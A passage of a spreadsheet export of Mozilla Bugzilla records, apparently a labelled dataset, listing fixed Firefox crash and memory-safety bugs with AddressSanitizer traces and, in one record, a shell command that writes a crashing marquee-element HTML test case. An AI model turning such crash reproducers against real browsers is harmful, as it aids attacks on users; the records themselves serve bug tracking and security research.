          <t>--</t>
        </is>
      </c>
      <c r="R1780" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1780" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T1780" t="n">
        <v>1</v>
      </c>
      <c r="U1780" t="n">
        <v>0</v>
      </c>
      <c r="V1780" t="n">
        <v>70</v>
      </c>
      <c r="W1780" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-80d445f7-8ef7-4c94-8916-773ad2140504.
=============================================================
It looks like |data| is null in NS_CycleCollectorSuspect3, which either means we're late in shutdown or we're calling it on a thread that does not support cycle collection.  Given that we're not on the main thread, I think it is the latter.  This field has type nsIXPConnectJSObjectHolder, which I don't think is ever okay to use off main thread.  I'm not sure if something changed here recently or what.
This is the #23 crash on Nightly.</t>
        </is>
      </c>
      <c r="X1780" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" t="n">
        <v>791601</v>
      </c>
      <c r="B1781" t="inlineStr">
        <is>
          <t>2012-09-16 19:07:47 -0700</t>
        </is>
      </c>
      <c r="C1781" t="inlineStr">
        <is>
          <t>"Assertion failure: checkmTextrun ? !mTextRun : !Properties().Get(UninflatedTextRunProperty())" with font inflation, -moz-column</t>
        </is>
      </c>
      <c r="D1781" t="inlineStr">
        <is>
          <t>2013-07-02 13:01:06 -0700</t>
        </is>
      </c>
      <c r="E1781" t="n">
        <v>1</v>
      </c>
      <c r="F1781" t="n">
        <v>1</v>
      </c>
      <c r="G1781" t="n">
        <v>3</v>
      </c>
      <c r="H1781" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1781" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1781" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1781" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1781" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1781" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q1781" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1781" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1781" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T1781" t="n">
        <v>1</v>
      </c>
      <c r="U1781" t="n">
        <v>0</v>
      </c>
      <c r="V1781" t="n">
        <v>24</v>
      </c>
      <c r="W1781" t="inlineStr">
        <is>
          <t>Created attachment 661662
testcase (requires pref) (crashes Firefox)
With:
  user_pref("font.size.inflation.emPerLine", 15);
Loading the testcase triggers:
Assertion failure: checkmTextrun ? !mTextRun : !Properties().Get(UninflatedTextRunProperty()), at /Users/jruderman/trees/mozilla-central/layout/generic/nsTextFrameThebes.cpp:4373
Security-sensitive because the assertion was added in a security-sensitive bug.</t>
        </is>
      </c>
      <c r="X1781" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" t="n">
        <v>1453759</v>
      </c>
      <c r="B1782" t="inlineStr">
        <is>
          <t>2018-04-12 12:10:09 -0700</t>
        </is>
      </c>
      <c r="C1782" t="inlineStr">
        <is>
          <t>Port OrangeFactor extension to treeherder</t>
        </is>
      </c>
      <c r="D1782" t="inlineStr">
        <is>
          <t>2019-10-15 16:24:26 -0700</t>
        </is>
      </c>
      <c r="E1782" t="n">
        <v>1</v>
      </c>
      <c r="F1782" t="n">
        <v>1</v>
      </c>
      <c r="G1782" t="n">
        <v>7</v>
      </c>
      <c r="H1782" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1782" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1782" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K1782" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L1782" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1782" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1782" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1782" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1782" t="inlineStr"/>
      <c r="Q1782" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1782" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1782" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1782" t="n">
        <v>1</v>
      </c>
      <c r="U1782" t="n">
        <v>0</v>
      </c>
      <c r="V1782" t="n">
        <v>9</v>
      </c>
      <c r="W1782" t="inlineStr">
        <is>
          <t>https://brasstacks.mozilla.com/orangefactor/ has been replaced by https://treeherder.mozilla.org/intermittent-failures.html but the OrangeFactor extension still points to brasstacks, which is due to be decommissioned.
The OF extension should get its data from treeherder and provide a link to the treeherder intermittents view.</t>
        </is>
      </c>
      <c r="X1782" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" t="n">
        <v>798677</v>
      </c>
      <c r="B1783" t="inlineStr">
        <is>
          <t>2012-10-05 18:26:44 -0700</t>
        </is>
      </c>
      <c r="C1783" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsPlaintextEditor::FireClipboardEvent</t>
        </is>
      </c>
      <c r="D1783" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:46 -0700</t>
        </is>
      </c>
      <c r="E1783" t="n">
        <v>1</v>
      </c>
      <c r="F1783" t="n">
        <v>1</v>
      </c>
      <c r="G1783" t="n">
        <v>3</v>
      </c>
      <c r="H1783" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1783" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1783" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1783" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1783" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1783" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1783" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1783" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q1783" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1783" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1783" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1783" t="n">
        <v>1</v>
      </c>
      <c r="U1783" t="n">
        <v>0</v>
      </c>
      <c r="V1783" t="n">
        <v>14</v>
      </c>
      <c r="W1783" t="inlineStr">
        <is>
          <t>Created attachment 668704
Testcase
Reproduces on trunk. Need to press Middle Mouse Scroll button to reproduce this.
=================================================================
==22895== ERROR: AddressSanitizer heap-use-after-free on address 0x7f905c63cd87 at pc 0x7f9088a312aa bp 0x7fff42180070 sp 0x7fff42180068
READ of size 1 at 0x7f905c63cd87 thread T0
    #0 0x7f9088a312a9 in nsPlaintextEditor::FireClipboardEvent(int) editor/libeditor/text/nsPlaintextEditor.cpp:1156
    #1 0x7f9088f59036 in nsHTMLEditor::Paste(int) editor/libeditor/html/nsHTMLDataTransfer.cpp:1477
    #2 0x7f9088b5dabf in nsEditorEventListener::MouseClick(nsIDOMEvent*) editor/libeditor/base/nsEditorEventListener.cpp:559
    #3 0x7f90891ec73e in nsHTMLEditorEventListener::MouseClick(nsIDOMEvent*) editor/libeditor/html/nsHTMLEditorEventListener.cpp:244
    #4 0x7f9088b57085 in nsEditorEventListener::HandleEvent(nsIDOMEvent*) editor/libeditor/base/nsEditorEventListener.cpp:316
    #5 0x7f90866aad7b in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) content/events/src/nsEventListenerManager.cpp:869
    #6 0x7f90866ac4f8 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) content/events/src/nsEventListenerManager.cpp:942
    #7 0x7f908684304f in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) content/events/src/nsEventListenerManager.h:143
    #8 0x7f9086832bee in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) content/events/src/nsEventDispatcher.cpp:182
    #9 0x7f90868301ad in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) content/events/src/nsEventDispatcher.cpp:283
    #10 0x7f9086836e79 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) content/events/src/nsEventDispatcher.cpp:629
    #11 0x7f908408f82c in PresShell::HandleEventInternal(nsEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6437
    #12 0x7f9084090cf1 in PresShell::HandleEventWithTarget(nsEvent*, nsIFrame*, nsIContent*, nsEventStatus*) layout/base/nsPresShell.cpp:6223
    #13 0x7f908671b9b2 in nsEventStateManager::CheckForAndDispatchClick(nsPresContext*, nsMouseEvent*, nsEventStatus*) content/events/src/nsEventStateManager.cpp:4526
    #14 0x7f9086715020 in nsEventStateManager::PostHandleEvent(nsPresContext*, nsEvent*, nsIFrame*, nsEventStatus*) content/events/src/nsEventStateManager.cpp:3282
    #15 0x7f90840900a9 in PresShell::HandleEventInternal(nsEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6462
    #16 0x7f9084089ea3 in PresShell::HandlePositionedEvent(nsIFrame*, nsGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6208
    #17 0x7f9084081ed6 in PresShell::HandleEvent(nsIFrame*, nsGUIEvent*, bool, nsEventStatus*) layout/base/nsPresShell.cpp:6007
    #18 0x7f90879f339c in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) view/src/nsViewManager.cpp:767
    #19 0x7f90879def37 in nsView::HandleEvent(nsGUIEvent*, bool) view/src/nsView.cpp:1062
    #20 0x7f90879df18d in non-virtual thunk to nsView::HandleEvent(nsGUIEvent*, bool) :?
    #21 0x7f908d14ce0a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) widget/gtk2/nsWindow.cpp:458
    #22 0x7f908d1817a5 in nsWindow::OnButtonReleaseEvent(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:2772
    #23 0x7f908d197919 in button_release_event_cb(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:5270
    #24 0x7f907eafcdd7 in ?? ??:0
0x7f905c63cd87 is located 263 bytes inside of 824-byte region [0x7f905c63cc80,0x7f905c63cfb8)
freed by thread T0 here:
    #0 0x4c3580 in __interceptor_free ??:?
    #1 0x7f909d419406 in moz_free memory/mozalloc/mozalloc.cpp:51
    #2 0x7f9088f964dd in operator delete(void*) ../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f9088a7e3c4 in nsEditor::Release() editor/libeditor/base/nsEditor.cpp:211
    #4 0x7f9088f9e557 in nsHTMLEditor::Release() editor/libeditor/html/nsHTMLEditor.cpp:203
    #5 0x7f90821c209b in ~nsCOMPtr_base ../../dist/include/nsCOMPtr.h:408
    #6 0x7f9084234a69 in nsCOMPtr&lt;nsIEditor&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #7 0x7f908421d006 in nsCOMPtr&lt;nsIEditor&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #8 0x7f908c546887 in nsEditingSession::TearDownEditorOnWindow(nsIDOMWindow*) editor/composer/src/nsEditingSession.cpp:594
    #9 0x7f90872a579a in nsHTMLDocument::TurnEditingOff() content/html/document/src/nsHTMLDocument.cpp:2588
    #10 0x7f90872a6b95 in nsHTMLDocument::EditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2637
    #11 0x7f90872cb56c in nsHTMLDocument::MaybeEditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2342
    #12 0x7f90872cbd1d in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2355
    #13 0x7f90844ce1d3 in ~mozAutoDocUpdate content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:35
    #14 0x7f908449a6d6 in ~mozAutoDocUpdate content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:33
    #15 0x7f90858d85f6 in nsDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/base/src/nsDocument.cpp:2143
    #16 0x7f9087297864 in nsHTMLDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/html/document/src/nsHTMLDocument.cpp:285
    #17 0x7f90858d70fa in nsDocument::Reset(nsIChannel*, nsILoadGroup*) content/base/src/nsDocument.cpp:2081
    #18 0x7f908729737a in nsHTMLDocument::Reset(nsIChannel*, nsILoadGroup*) content/html/document/src/nsHTMLDocument.cpp:272
    #19 0x7f90872b92d0 in nsHTMLDocument::Open(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, JSContext*, unsigned char, nsISupports**) content/html/document/src/nsHTMLDocument.cpp:1525
    #20 0x7f90872bd0d1 in non-virtual thunk to nsHTMLDocument::Open(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, JSContext*, unsigned char, nsISupports**) :?
    #21 0x7f908f9244d3 in NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #22 0x7f908aab6bf8 in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:3108
    #23 0x7f908ab14fe9 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1469
    #24 0x7f909604828f in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:364
    #25 0x7f9095fea1bc in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2461
    #26 0x7f9095f35c1e in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #27 0x7f9096048a80 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:378
    #28 0x7f909589ab84 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:109
    #29 0x7f909604ded0 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:411
previously allocated by thread T0 here:
    #0 0x4c3640 in malloc ??:?
    #1 0x7f909d41955a in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7f9083a71abe in operator new(unsigned long) ../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f908f4dd07b in mozilla::GenericFactory::CreateInstance(nsISupports*, nsID const&amp;, void**) objdir-ff-asan-sym/xpcom/build/GenericFactory.cpp:16
    #4 0x7f908f7bb5cc in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) xpcom/components/nsComponentManager.cpp:1006
    #5 0x7f908f466df9 in CallCreateInstance(char const*, nsISupports*, nsID const&amp;, void**) objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:135
    #6 0x7f908f4681cb in nsCreateInstanceByContractID::operator()(nsID const&amp;, void**) const objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:178
    #7 0x7f908f45bb1c in nsCOMPtr_base::assign_from_helper(nsCOMPtr_helper const&amp;, nsID const&amp;) objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:110
    #8 0x7f9086a39c6e in nsCOMPtr&lt;nsIEditor&gt;::operator=(nsCOMPtr_helper const&amp;) ../../../dist/include/nsCOMPtr.h:689
    #9 0x7f908c53f554 in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) editor/composer/src/nsEditingSession.cpp:423
    #10 0x7f908c536a00 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) editor/composer/src/nsEditingSession.cpp:173
    #11 0x7f90872a7d7b in nsHTMLDocument::EditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2696
    #12 0x7f90872cb56c in nsHTMLDocument::MaybeEditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2342
    #13 0x7f90872cbd1d in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2355
    #14 0x7f9088e0983a in nsHtml5TreeOpExecutor::EndDocUpdate() parser/html/nsHtml5TreeOpExecutor.h:248
    #15 0x7f9088e08e78 in nsHtml5TreeOpExecutor::DidBuildModel(bool) parser/html/nsHtml5TreeOpExecutor.cpp:131
    #16 0x7f9088df6188 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:639
    #17 0x7f9088e0d435 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:564
    #18 0x7f9088e49b19 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:127
    #19 0x7f908f811440 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #20 0x7f908f4a22bb in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #21 0x7f908de4d956 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #22 0x7f908faeaab1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
    #23 0x7f908faea8e6 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:201
    #24 0x7f908faea7cb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:175
Shadow byte and word:
  0x1ff20b8c79b0: fd
  0x1ff20b8c79b0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff20b8c7990: fd fd fd fd fd fd fd fd
  0x1ff20b8c7998: fd fd fd fd fd fd fd fd
  0x1ff20b8c79a0: fd fd fd fd fd fd fd fd
  0x1ff20b8c79a8: fd fd fd fd fd fd fd fd
=&gt;0x1ff20b8c79b0: fd fd fd fd fd fd fd fd
  0x1ff20b8c79b8: fd fd fd fd fd fd fd fd
  0x1ff20b8c79c0: fd fd fd fd fd fd fd fd
  0x1ff20b8c79c8: fd fd fd fd fd fd fd fd
  0x1ff20b8c79d0: fd fd fd fd fd fd fd fd
Stats: 250M malloced (292M for red zones) by 500781 calls
Stats: 42M realloced by 23522 calls
Stats: 222M freed by 274938 calls
Stats: 88M really freed by 188351 calls
Stats: 476M (121944 full pages) mmaped in 119 calls
  mmaps   by size class: 8:294894; 9:32764; 10:8190; 11:14329; 12:2048; 13:1536; 14:1280; 15:256; 16:1152; 17:1280; 18:128; 19:40; 20:20;
  mallocs by size class: 8:434817; 9:32109; 10:8727; 11:16263; 12:2466; 13:1715; 14:1538; 15:314; 16:1299; 17:1322; 18:151; 19:40; 20:20;
  frees   by size class: 8:225151; 9:23605; 10:5504; 11:13174; 12:1615; 13:1517; 14:1380; 15:265; 16:1236; 17:1305; 18:132; 19:37; 20:17;
  rfrees  by size class: 8:165731; 9:8622; 10:2115; 11:8698; 12:626; 13:552; 14:481; 15:146; 16:1042; 17:308; 18:25; 19:4; 20:1;
Stats: malloc large: 1533 small slow: 2447
==22895== ABORTING</t>
        </is>
      </c>
      <c r="X1783" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" t="n">
        <v>619021</v>
      </c>
      <c r="B1784" t="inlineStr">
        <is>
          <t>2010-12-14 00:11:19 -0800</t>
        </is>
      </c>
      <c r="C1784" t="inlineStr">
        <is>
          <t>crash when opening a page with several marquee elements [@ nsStyleSet::GetContext ]</t>
        </is>
      </c>
      <c r="D1784" t="inlineStr">
        <is>
          <t>2024-05-29 15:47:01 -0700</t>
        </is>
      </c>
      <c r="E1784" t="n">
        <v>1</v>
      </c>
      <c r="F1784" t="n">
        <v>1</v>
      </c>
      <c r="G1784" t="n">
        <v>3</v>
      </c>
      <c r="H1784" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1784" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1784" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1784" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1784" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1784" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker](?) [qa-examined-191] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1784" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1784" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1784" t="inlineStr">
        <is>
          <t>mozilla2.0b10</t>
        </is>
      </c>
      <c r="T1784" t="n">
        <v>1</v>
      </c>
      <c r="U1784" t="n">
        <v>0</v>
      </c>
      <c r="V1784" t="n">
        <v>56</v>
      </c>
      <c r="W1784" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7
Build Identifier: Firefox 4.0b7
Opening a specific HTML document consisting mainly of marquee elements causes current Firefox 4.0b7 to crash with an invalid read of size 4 with a high address (0xf0dea813) in libxul.so.
Reproducible: Always
Steps to Reproduce:
1.$ echo "&lt;foo&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;marquee&gt; 
&lt;marquee&gt; &lt;foo&gt; &lt;marquee&gt; &lt;foo&gt; &lt;marquee&gt; &lt;foo&gt; &lt;object&gt; &lt;marquee&gt; 
&lt;foo&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;foo&gt; &lt;foo&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;foo&gt; 
&lt;marquee&gt; &lt;marquee&gt; &lt;marquee&gt; &lt;foo&gt; &lt;marquee&gt; &lt;foo&gt; &lt;foo&gt; &lt;marquee&gt; 
&lt;marquee&gt;" &gt; marquee.html
2. 
3. firefox marquee.html
Actual Results:  
Firefox crashes with a segfault.
Expected Results:  
Firefox remains running.
This looks like a potentially dangerous crash to me. 4.0 stable release is probably not too far off, and many people are already using 4.0 beta series, so reporting this as a security issue to be on the safe side.</t>
        </is>
      </c>
      <c r="X1784" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" t="n">
        <v>897873</v>
      </c>
      <c r="B1785" t="inlineStr">
        <is>
          <t>2013-07-25 00:39:01 -0700</t>
        </is>
      </c>
      <c r="C1785" t="inlineStr">
        <is>
          <t>[Buri][WIFI][language]Secrecy  information of AP are not translated automatic</t>
        </is>
      </c>
      <c r="D1785" t="inlineStr">
        <is>
          <t>2014-02-19 23:37:20 -0800</t>
        </is>
      </c>
      <c r="E1785" t="n">
        <v>1</v>
      </c>
      <c r="F1785" t="n">
        <v>1</v>
      </c>
      <c r="G1785" t="n">
        <v>6</v>
      </c>
      <c r="H1785" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1785" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1785" t="inlineStr">
        <is>
          <t>Gaia::Settings</t>
        </is>
      </c>
      <c r="K1785" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1785" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1785" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1785" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1785" t="inlineStr"/>
      <c r="Q1785" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1785" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1785" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1785" t="n">
        <v>1</v>
      </c>
      <c r="U1785" t="n">
        <v>0</v>
      </c>
      <c r="V1785" t="n">
        <v>14</v>
      </c>
      <c r="W1785" t="inlineStr">
        <is>
          <t>AU_LINUX_GECKO_ICS_STRAWBERRY.01.01.00.019.164
 Firefox os  v1.1
 Mozilla build ID:20130715070218
 Created an attachment (id=468630)
 PIC-1
 DEFECT DESCRIPTION:
 Secrecy of AP are not translate seasonable
 REPRODUCING PROCEDURES:
 1.change language to polski 
 2.setting-&gt;wifi,you will find information not translate of AP automatic-&gt;KO1
 3.change language to english
 4.setting-&gt;wifi,you will find information not translate of AP automatic-&gt;KO2
 EXPECTED BEHAVIOUR:
 it should be translated into polski
 ASSOCIATE SPECIFICATION:
 TEST PLAN REFERENCE:
 TOOLS AND PLATFORMS USED:
 USER IMPACT:mid
 REPRODUCING RATE:5/5
 For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X1785" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" t="n">
        <v>888820</v>
      </c>
      <c r="B1786" t="inlineStr">
        <is>
          <t>2013-06-30 22:37:59 -0700</t>
        </is>
      </c>
      <c r="C1786" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow READ in nsHtml5TreeBuilder::resetTheInsertionMode()</t>
        </is>
      </c>
      <c r="D1786" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:57 -0700</t>
        </is>
      </c>
      <c r="E1786" t="n">
        <v>1</v>
      </c>
      <c r="F1786" t="n">
        <v>1</v>
      </c>
      <c r="G1786" t="n">
        <v>3</v>
      </c>
      <c r="H1786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1786" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1786" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1786" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1786" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1786" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1786" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1786" t="inlineStr">
        <is>
          <t>[asan][adv-main24+]</t>
        </is>
      </c>
      <c r="Q1786" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1786" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1786" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1786" t="n">
        <v>1</v>
      </c>
      <c r="U1786" t="n">
        <v>0</v>
      </c>
      <c r="V1786" t="n">
        <v>22</v>
      </c>
      <c r="W1786" t="inlineStr">
        <is>
          <t>Created attachment 769587
Repro-file
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN debug-build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-dbg-asan/1372636004/
ASAN-report:
==8023== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdd5ba3d03c at pc 0x7fdd88de045b bp 0x7fdd67267480 sp 0x7fdd67267478
READ of size 4 at 0x7fdd5ba3d03c thread T16
    #0 0x7fdd88de045a in nsHtml5TreeBuilder::resetTheInsertionMode() /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5TreeBuilder.cpp:3247
    #1 0x7fdd88de39e6 in nsHtml5TreeBuilder::eof() /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5TreeBuilder.cpp:529
    #2 0x7fdd88dc4cf2 in nsHtml5StreamParser::ParseAvailableData() /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5StreamParser.cpp:1293
